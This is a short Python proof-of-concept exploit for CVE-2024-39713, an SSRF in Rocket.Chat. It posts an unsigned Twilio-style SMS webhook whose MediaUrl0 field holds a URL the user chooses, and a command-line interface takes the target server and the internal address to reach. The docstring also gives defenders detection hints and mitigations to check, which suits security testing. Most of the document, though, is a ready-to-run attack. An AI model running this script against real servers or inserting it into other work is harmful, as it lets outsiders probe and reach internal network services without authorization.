POC / CVE-2024-39713.py PY
import requests
import json
import argparse


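def exploit(url, target):
    """Send one Twilio-style incoming-SMS webhook carrying a caller-chosen media URL.

    The request is a JSON POST to ``/api/v1/livechat/sms-incoming/twilio`` with
    ``NumMedia`` set to ``"1"`` and ``MediaUrl0`` set to ``target``. No
    credentials or signature header are sent. The script labels this as the
    SSRF tracked as CVE-2024-39713; presumably the server dereferences
    ``MediaUrl0`` itself, but that fetch is not observable from this function.

    Notes for reviewers and defenders:
        * An HTTP 200 only shows that the endpoint accepted the POST. It does
          not show that any outbound request was made.
        * On the server side the same shape is what to look for: POSTs to this
          path from sources other than the SMS provider, with ``MediaUrl0``
          naming an internal, loopback or link-local address.
        * Mitigations to verify: the vendor fix for this CVE is installed, the
          webhook validates the provider's request signature, and the chat
          server's egress to internal ranges is filtered.

    Args:
        url: Base URL of the Rocket.Chat server under test.
        target: URL placed in the ``MediaUrl0`` field.

    Returns:
        None. The outcome is printed to stdout.
    """
    headers = {"Content-Type": "application/json"}
    data = {
        "To": "+123",
        "From": "+123",
        "Body": "body",
        "NumMedia": "1",
        "MediaUrl0": target,
        "MediaContentType0": "text/plain",
    }

    # Normalise the base URL so a trailing slash does not produce "//api/...".
    endpoint = url.rstrip("/") + "/api/v1/livechat/sms-incoming/twilio"

    try:
        # requests has no default timeout; without one an unresponsive server
        # blocks the script indefinitely.
        response = requests.post(
            endpoint, headers=headers, data=json.dumps(data), timeout=10
        )
    except requests.RequestException as exc:
        print(f"[-] Request error: {exc}")
        return

    if response.status_code == 200:
        # Accepted by the endpoint; see the docstring for what this does not prove.
        print("[+] Request sent...")
    else:
        print("[-] Exploit failed")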


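if __name__ == "__main__":
    # Command-line entry point: parse the two URLs and issue a single request.
    parser = argparse.ArgumentParser(description="Rocket.Chat SSRF PoC (CVE-2024-39713)")
    # Both options are required: when either is omitted argparse leaves it as
    # None, and exploit() then fails on a None/str operation instead of
    # printing a usage error.
    parser.add_argument("-u", "--url", required=True, help="Rocket.Chat server URL")
    parser.add_argument("-t", "--target", required=True, help="SSRF target")
    args = parser.parse_args()

    print("[+] Rocket.Chat SSRF PoC (CVE-2024-39713)")

    exploit(args.url, args.target)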